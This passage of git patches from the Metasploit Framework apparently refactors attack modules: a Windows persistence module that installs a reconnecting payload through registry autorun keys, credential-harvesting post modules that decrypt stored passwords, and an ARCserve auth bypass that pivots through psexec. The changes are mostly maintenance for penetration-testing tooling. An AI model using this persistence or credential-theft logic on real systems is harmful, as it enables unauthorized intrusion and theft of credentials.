diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index 833e4383d2..34240e01a5 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/exploit/powershell'
 
 class Metasploit4 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::EXE

From afcb0168148cbcd5d2d0d81e4e4d9429eb86d1a8 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 18 Jun 2015 13:25:39 -0500
Subject: [PATCH 0449/1013] Minor description fixups.

Edited modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
first landed in #5524, adobe_flash_pixel_bender_bof in flash renderer .
Removed ASCII bullets since those rarely render correctly.

Edited modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
first landed in #5252, @espreto's module for WordPress Front-end Editor
File Upload Vuln . Fixed up some language usage, camel-cased "WordPress."
---
 .../multi/browser/adobe_flash_pixel_bender_bof.rb     | 11 ++++++-----
 .../unix/webapp/wp_frontend_editor_file_upload.rb     |  8 ++++----
 2 files changed, 10 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
index 7265fba575..f79bc97fd5 100644
--- a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
@@ -17,11 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
         vulnerability occurs in the flash.Display.Shader class, when setting specially
         crafted data as its bytecode, as exploited in the wild in April 2014. This module
-        has been tested successfully on:
-        * Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182.
-        * Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182
-        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182.
-        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.350
+        has been tested successfully on the following operating systems and Flash versions:
+
+        Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182,
+        Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182,
+        Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182,
+        Linux Mint "Rebecca" (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
index 1c9663d6d0..7ed5393e6f 100644
--- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
@@ -16,10 +16,10 @@ class Metasploit3 < Msf::Exploit::Remote
       info,
       'Name'           => 'Wordpress Front-end Editor File Upload',
       'Description'    => %q{
-          The Wordpress Front-end Editor plugin contains an authenticated file upload
-          vulnerability. We can upload arbitrary files to the upload folder, because
-          the plugin also uses it's own file upload mechanism instead of the wordpress
-          api it's possible to upload any file type.
+          The WordPress Front-end Editor plugin contains an authenticated file upload
+          vulnerability. An attacker can upload arbitrary files to the upload folder because
+          the plugin uses its own file upload mechanism instead of the WordPress API, which
+          incorrectly allows uploads of any file type.
       },
       'Author'         =>
         [

From 0b55a889d31a471871998f7d43cb2a4afbfca0f1 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Thu, 18 Jun 2015 21:10:16 +0100
Subject: [PATCH 0450/1013] persistence - better ruby/msf fu

---
 modules/exploits/windows/local/persistence.rb | 64 +++++++++----------
 1 file changed, 32 insertions(+), 32 deletions(-)

diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
index 5747da35d4..833c76d007 100644
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -31,51 +31,50 @@ class Metasploit3 < Msf::Exploit::Local
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
-          'Carlos Perez <carlos_perez[at]darkoperator.com>'
+          'Carlos Perez <carlos_perez[at]darkoperator.com>',
+          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DefaultTarget' => 0,
       'DisclosureDate'=> "Oct 19 2011",
-      'DefaultOptions' =>
+      'DefaultOptions'=>
         {
           'DisablePayloadHandler' => 'true',
         }
     ))
 
-    register_options(
-      [
-        OptInt.new('DELAY',
-          [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
-        OptEnum.new('STARTUP',
-          [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
-        OptString.new('VBS_NAME',
-          [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
-        OptString.new('EXE_NAME',
-          [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
-        OptString.new('REG_NAME',
-          [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
-        OptString.new('PATH',
-          [false, 'Path to write payload (%TEMP% by default).', nil]),
-      ], self.class)
+    register_options([
+      OptInt.new('DELAY',
+        [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
+      OptEnum.new('STARTUP',
+        [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+      OptString.new('VBS_NAME',
+        [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
+      OptString.new('EXE_NAME',
+        [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+      OptString.new('REG_NAME',
+        [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write payload (%TEMP% by default).', nil])
+    ], self.class)
 
     register_advanced_options([
       OptBool.new('HANDLER',
         [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
       OptBool.new('EXEC_AFTER',
         [ false, 'Execute persistent script after installing.', false])
-      ], self.class)
+    ], self.class)
   end
 
   # Exploit method for when exploit command is issued
   def exploit
-    print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-
     # Define default values
     rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    startup   = datastore['STARTUP'].downcase
     delay = datastore['DELAY'] || 10
     exc_after = datastore['EXEC_AFTER'] || false
     handler = datastore['HANDLER'] || false
@@ -87,13 +86,14 @@ class Metasploit3 < Msf::Exploit::Local
     # Connect to the session
     begin
       host, port = session.session_host, session.session_port
+      print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
     rescue => e
       print_error("Could not connect to session")
       return nil
     end
 
     # Check values
-    if (is_system?) && (datastore['STARTUP'] == 'USER')
+    if (is_system?) && (startup == 'user')
       print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
     end
 
@@ -105,31 +105,30 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     # Generate the exe payload
-    print_status("Generating EXE payload (#{rexe_name})") if datastore['VERBOSE']
+    vprint_status("Generating EXE payload (#{rexe_name})")
     exe = generate_payload_exe
     # Generate the vbs payload
-    print_status("Generating VBS persistent script (#{rvbs_name})") if datastore['VERBOSE']
+    vprint_status("Generating VBS persistent script (#{rvbs_name})")
     vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
     # Writing the payload to target
-    print_status("Writing payload inside the VBS script on the target") if datastore['VERBOSE']
+    vprint_status("Writing payload inside the VBS script on the target")
     script_on_target = write_script_to_target(vbsscript, rvbs_name)
-
     # Exit the module because we failed to write the file on the target host
     # Feedback has already been given to the user, via the function.
     return unless script_on_target
 
     # Initial execution of persistent script
-    case datastore['STARTUP']
-    when 'USER'
+    case startup
+    when 'user'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKCU", script_on_target, reg_val)
-      print_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on") if datastore['VERBOSE']
-    when 'SYSTEM'
+      vprint_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on")
+    when 'system'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKLM", script_on_target, reg_val)
-      print_status("Payload will execute at the next SYSTEM startup") if datastore['VERBOSE']
+      vprint_status("Payload will execute at the next SYSTEM startup")
     else
-      print_error("Something went wrong. Invalid STARTUP method: #{datastore['STARTUP']}")
+      print_error("Something went wrong. Invalid STARTUP method: #{startup}")
       return nil
     end
 
@@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Local
     # Create 'clean up' resource file
     clean_rc = log_file()
     file_local_write(clean_rc, @clean_up_rc)
-    print_status("Clean up Meterpreter .RC file: #{clean_rc}")
+    print_status("Clean up Meterpreter RC file: #{clean_rc}")
 
     report_note(:host => host,
       :type => "host.persistance.cleanup",
@@ -183,6 +182,7 @@ class Metasploit3 < Msf::Exploit::Local
         print_good("Deleted #{filepath}")
       rescue
         print_error("Unable to delete file!")
+        return nil
       end
     end
 

From 308cad8c4067c77edbdfc694de0d34143b2147ee Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 18 Jun 2015 18:51:16 -0500
Subject: [PATCH 0451/1013] Fix #5565, Fix os.js service pack detection

Fix #5565
---
 data/js/detect/os.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/data/js/detect/os.js b/data/js/detect/os.js
index 58447e8b51..b1ad75db2b 100644
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@@ -1027,7 +1027,7 @@ os_detect.getVersion = function(){
 			}
 			switch (navigator.appMinorVersion){
 				case ";SP2;":
-					ua_version += ";SP2";
+					os_sp = "SP2";
 					break;
 			}
 		}

From 8656add0add5ff504ce8d2fa163647367bf43030 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 19 Jun 2015 10:55:22 +1000
Subject: [PATCH 0452/1013] Add uri parameter when removing http/s transports

---
 lib/rex/post/meterpreter/client_core.rb       | 10 +++++++--
 .../ui/console/command_dispatcher/core.rb     | 21 +++++++++++++------
 2 files changed, 23 insertions(+), 8 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 4d6f5ad1e2..9ff18cfba7 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -658,8 +658,14 @@ class ClientCore < Extension
 
     # do more magic work for http(s) payloads
     unless opts[:transport].ends_with?('tcp')
-      sum = uri_checksum_lookup(:connect)
-      url << generate_uri_uuid(sum, opts[:uuid]) + '/'
+      if opts[:uri]
+        url << '/' unless opts[:uri].start_with?('/')
+        url << opts[:uri]
+        url << '/' unless opts[:uri].end_with?('/')
+      else
+        sum = uri_checksum_lookup(:connect)
+        url << generate_uri_uuid(sum, opts[:uuid]) + '/'
+      end
 
       # TODO: randomise if not specified?
       opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index b9e151cf0d..6fe12a4fb3 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -543,12 +543,13 @@ class Console::CommandDispatcher::Core
     '-t'  => [ true,  "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}" ],
     '-l'  => [ true,  'LHOST parameter (for reverse transports)' ],
     '-p'  => [ true,  'LPORT parameter' ],
-    '-ua' => [ true,  'User agent for http(s) transports (optional)' ],
-    '-ph' => [ true,  'Proxy host for http(s) transports (optional)' ],
-    '-pp' => [ true,  'Proxy port for http(s) transports (optional)' ],
-    '-pu' => [ true,  'Proxy username for http(s) transports (optional)' ],
-    '-ps' => [ true,  'Proxy password for http(s) transports (optional)' ],
-    '-pt' => [ true,  'Proxy type for http(s) transports (optional: http, socks; default: http)' ],
+    '-u'  => [ true,  'Custom URI for HTTP/S transports (used when removing transports)' ],
+    '-ua' => [ true,  'User agent for HTTP/S transports (optional)' ],
+    '-ph' => [ true,  'Proxy host for HTTP/S transports (optional)' ],
+    '-pp' => [ true,  'Proxy port for HTTP/S transports (optional)' ],
+    '-pu' => [ true,  'Proxy username for HTTP/S transports (optional)' ],
+    '-ps' => [ true,  'Proxy password for HTTP/S transports (optional)' ],
+    '-pt' => [ true,  'Proxy type for HTTP/S transports (optional: http, socks; default: http)' ],
     '-c'  => [ true,  'SSL certificate path for https transport verification (optional)' ],
     '-to' => [ true,  'Comms timeout (seconds) (default: same as current session)' ],
     '-ex' => [ true,  'Expiration timout (seconds) (default: same as current session)' ],
@@ -592,6 +593,7 @@ class Console::CommandDispatcher::Core
       :transport     => nil,
       :lhost         => nil,
       :lport         => nil,
+      :uri           => nil,
       :ua            => nil,
       :proxy_host    => nil,
       :proxy_port    => nil,
@@ -611,6 +613,8 @@ class Console::CommandDispatcher::Core
       case opt
       when '-c'
         opts[:cert] = val
+      when '-u'
+        opts[:uri] = val
       when '-ph'
         opts[:proxy_host] = val
       when '-pp'
@@ -735,6 +739,11 @@ class Console::CommandDispatcher::Core
         print_error("Failed to add transport, please check the parameters")
       end
     when 'remove'
+      if !opts[:transport].end_with?('_tcp') && opts[:uri].nil?
+        print_error("HTTP/S transport specified without session URI")
+        return
+      end
+
       print_status("Removing transport ...")
       if client.core.transport_remove(opts)
         print_good("Successfully removed #{opts[:transport]} transport.")

From 9b5770c966abb51ed392a40cceaeaadb393af69f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 18 Jun 2015 23:40:51 -0500
Subject: [PATCH 0453/1013] Change to
 Metasploit::Model::Login::Status::SUCCESSFUL

---
 modules/auxiliary/scanner/http/wordpress_login_enum.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
index 86935219e2..b63a7b7bad 100644
--- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb
+++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)
 
     create_credential_login(login_data)

From fb9ad663f79754dbafc524b64d99947802609e22 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 18 Jun 2015 23:42:16 -0500
Subject: [PATCH 0454/1013] Change to
 Metasploit::Model::Login::Status::SUCCESSFUL

---
 modules/exploits/linux/http/kloxo_sqli.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb
index 39888ff29a..ac49c0589f 100644
--- a/modules/exploits/linux/http/kloxo_sqli.rb
+++ b/modules/exploits/linux/http/kloxo_sqli.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)
 
     create_credential_login(login_data)

From 7e91121afcd174e7c8b27aff2c1e0c81da699253 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 18 Jun 2015 23:44:45 -0500
Subject: [PATCH 0455/1013] Change to
 Metasploit::Model::Login::Status::SUCCESSFUL

---
 .../http/ca_arcserve_rpc_authbypass.rb        | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
index b2a8238115..d80ea7fba7 100644
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -130,15 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
       pass = resp[pass_index+1].gsub(/\"/, "")
     end
 
-    # report the auth
-    report_cred(
-      ip: datastore['RHOST'],
-      port: 445,
-      service_name: 'smb',
-      user: user,
-      password: pass
-    )
-
     srvc = {
         :host   => datastore['RHOST'],
         :port   => datastore['RPORT'],
@@ -154,6 +145,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
 
+    # report the auth
+    report_cred(
+      ip: datastore['RHOST'],
+      port: 445,
+      service_name: 'smb',
+      user: user,
+      password: pass
+    )
+
     # try psexec on the remote host
     psexec = framework.exploits.create("windows/smb/psexec")
     psexec.register_parent(self)

From fc1417809ea0410c862c1d22b417120944aa0543 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 19 Jun 2015 00:09:08 -0500
Subject: [PATCH 0456/1013] Support hash format

---
 .../gather/credentials/razer_synapse.rb       | 30 ++++++++++++++-----
 1 file changed, 23 insertions(+), 7 deletions(-)

diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb
index c73cd9de2b..c805c824af 100644
--- a/modules/post/windows/gather/credentials/razer_synapse.rb
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
@@ -71,9 +71,15 @@ class Metasploit3 < Msf::Post
       session_id: session_db_id,
       origin_type: :session,
       private_data: opts[:password],
-      private_type: :password,
+      private_type: opts[:type],
       username: opts[:user]
-    }.merge(service_data)
+    }
+
+    if opts[:type] == :nonreplayable_hash
+      credential_data[:jtr_format] = 'ODF-AES-opencl'
+    end
+
+    credential_data.merge!(service_data)
 
     login_data = {
       core: create_credential(credential_data),
@@ -85,7 +91,7 @@ class Metasploit3 < Msf::Post
 
   # Loop throuhg config, grab user and pass
   def get_creds(config)
-    creds = {}
+    creds = []
 
     return nil if !config.include?('<Version>')
 
@@ -93,12 +99,17 @@ class Metasploit3 < Msf::Post
     xml.xpath('//SavedCredentials').each do |node|
       user = node.xpath('Username').text
       pass = node.xpath('Password').text
+      type = :password
       begin
         pass = decrypt(pass)
       rescue OpenSSL::Cipher::CipherError
-        # Eh, ok. We tried.
+        type = :nonreplayable_hash
       end
-      creds[user] = pass
+      creds << {
+        user: user,
+        pass: pass,
+        type: type
+      }
     end
 
     creds
@@ -121,14 +132,19 @@ class Metasploit3 < Msf::Post
         # read the contents of file
         creds = get_creds(contents)
         unless creds.empty?
-          creds.each_pair do |user, pass|
+          creds.each do |c|
+            user = c[:user]
+            pass = c[:pass]
+            type = c[:type]
+
             print_good("Found cred: #{user}:#{pass}")
             report_cred(
               ip: razerzone_ip,
               port: 443,
               service_name: 'http',
               user: user,
-              password: pass
+              password: pass,
+              type: type
             )
           end
         end

From fc35a53ac5ffa289c0c36d959c6808d50b8d5f85 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 19 Jun 2015 00:14:58 -0500
Subject: [PATCH 0457/1013] Pass options correctly

---
 .../windows/gather/credentials/smartermail.rb | 27 ++++++++++---------
 1 file changed, 15 insertions(+), 12 deletions(-)

diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb
index 3d342642d2..a38d97c141 100644
--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -144,12 +144,12 @@ class Metasploit3 < Msf::Post
 
     if password
       begin
-        result['password'] = decrypt_des(Rex::Text.decode_base64(password))
-        result['password_type'] = :password
+        result[:password] = decrypt_des(Rex::Text.decode_base64(password))
+        result[:private_type] = :password
       rescue OpenSSL::Cipher::CipherError
-        result['password'] = password
-        result['password_type'] = :nonreplayable_hash
-        result['jtr_format'] = 'des'
+        result[:password] = password
+        result[:private_type] = :nonreplayable_hash
+        result[:jtr_format] = 'des'
       end
     end
 
@@ -170,12 +170,12 @@ class Metasploit3 < Msf::Post
       session_id: session_db_id,
       origin_type: :session,
       private_data: opts[:password],
-      private_type: opts[:password_type],
+      private_type: opts[:private_type],
       username: opts[:user]
     }
 
-    if opts['password_type'] == :nonreplayable_hash
-      credential_data.merge!(jtr_format: opts['jtr_format'])
+    if opts[:private_type] == :nonreplayable_hash
+      credential_data.merge!(jtr_format: opts[:jtr_format])
     end
 
     credential_data.merge!(service_data)
@@ -201,15 +201,17 @@ class Metasploit3 < Msf::Post
 
     # retrieve username and decrypted password from config file
     result = get_smartermail_creds(config_path)
-    if result['password'].nil?
+    if result[:password].nil?
       print_error "#{peer} - Could not decrypt password string"
       return
     end
 
     # report result
     port = get_web_server_port || 9998 # Default is 9998
-    user = result['username']
-    pass = result['password']
+    user = result[:username]
+    pass = result[:password]
+    type = result[:private_type]
+    format = result[:jtr_format]
     print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
 
     report_cred(
@@ -218,7 +220,8 @@ class Metasploit3 < Msf::Post
       service_name: 'http',
       user: user,
       password: pass,
-
+      private_type: type,
+      jtr_format: format
     )
   end
 end

From 76cd9590a45df3c784509b46f585dfaad2121b50 Mon Sep 17 00:00:00 2001
From: aushack <patrick@aushack.com>
Date: Fri, 19 Jun 2015 19:13:51 +1000
Subject: [PATCH 0458/1013] Fix author

---
 modules/auxiliary/dos/cisco/ios_http_percentpercent.rb  | 2 +-
 modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb
index f054e8072f..f70d685742 100644
--- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb
+++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
         unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
         tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
       },
-      'Author' 		=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
+      'Author' 		=> [ 'patrick' ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
index 0f45294816..8834046c39 100644
--- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
         control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module
         tested successfully against a Cisco 1600 Router IOS v11.3(11d).
       },
-      'Author'		=> [ 'Patrick Webster <patrick[at]aushack.com>', 'hdm' ],
+      'Author'		=> [ 'patrick', 'hdm' ],
       'License'		=> MSF_LICENSE,
       'References'	=>
         [

From 0d7ef6f04e92c9757ddd3f5447195a422217c583 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 09:29:00 -0500
Subject: [PATCH 0459/1013] Pass username as symbol

---
 modules/post/windows/gather/credentials/smartermail.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb
index a38d97c141..5c934c5584 100644
--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Post
     username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
     password = data.scan(/<(sysAdminPassword|sysAdminPasswordHash)>(.+)<\/(sysAdminPassword|sysAdminPasswordHash)>/).flatten[1]
 
-    result['username'] = username[1] unless username.nil?
+    result[:username] = username[1] unless username.nil?
 
     if password
       begin

From 6d2b7e05ef09c0d84f731b2e7cef3f1814b4a8c4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 09:35:20 -0500
Subject: [PATCH 0460/1013] Use downcase

---
 modules/post/windows/gather/credentials/razer_synapse.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb
index c805c824af..9d5d445164 100644
--- a/modules/post/windows/gather/credentials/razer_synapse.rb
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Post
     }
 
     if opts[:type] == :nonreplayable_hash
-      credential_data[:jtr_format] = 'ODF-AES-opencl'
+      credential_data[:jtr_format] = 'odf-aes-opencl'
     end
 
     credential_data.merge!(service_data)

From 357a3929a3738ef22dfc5547337528f1f781df7f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 09:51:36 -0500
Subject: [PATCH 0461/1013] Trying to report more accurate status

---
 .../http/ca_arcserve_rpc_authbypass.rb        | 31 +++++++++++++------
 1 file changed, 21 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
index d80ea7fba7..74dafffefd 100644
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      status: opts[:status]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -145,15 +145,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
 
-    # report the auth
-    report_cred(
-      ip: datastore['RHOST'],
-      port: 445,
-      service_name: 'smb',
-      user: user,
-      password: pass
-    )
-
     # try psexec on the remote host
     psexec = framework.exploits.create("windows/smb/psexec")
     psexec.register_parent(self)
@@ -182,11 +173,31 @@ class Metasploit3 < Msf::Exploit::Remote
         'RunAsJob' => true
       )
     rescue
+      report_cred(
+        ip: datastore['RHOST'],
+        port: 445,
+        service_name: 'smb',
+        user: user,
+        password: pass,
+        status: Metasploit::Model::Login::Status::INCORRECT
+      )
+
       print_status("Login attempt using windows/smb/psexec failed")
       print_status("Credentials have been stored and may be useful for authentication against other services.")
+      # report the auth
       return
     end
 
+    # report the auth
+    report_cred(
+      ip: datastore['RHOST'],
+      port: 445,
+      service_name: 'smb',
+      user: user,
+      password: pass,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    )
+
     handler
   end
 end

From 0f17f622c310641e26b9b36100748cd85f5a7ca2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 10:20:47 -0500
Subject: [PATCH 0462/1013] Report last_attempted_at

---
 modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
index 74dafffefd..9f5251b4e1 100644
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -78,7 +78,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     login_data = {
       core: create_credential(credential_data),
-      status: opts[:status]
+      status: opts[:status],
+      last_attempted_at: DateTime.now
     }.merge(service_data)
 
     create_credential_login(login_data)

From c2f0973ed092589e1d90bdfb827b7e2f43b4bd63 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 10:31:50 -0500
Subject: [PATCH 0463/1013] Report attempt_time

---
 modules/exploits/linux/http/kloxo_sqli.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb
index ac49c0589f..f933a516aa 100644
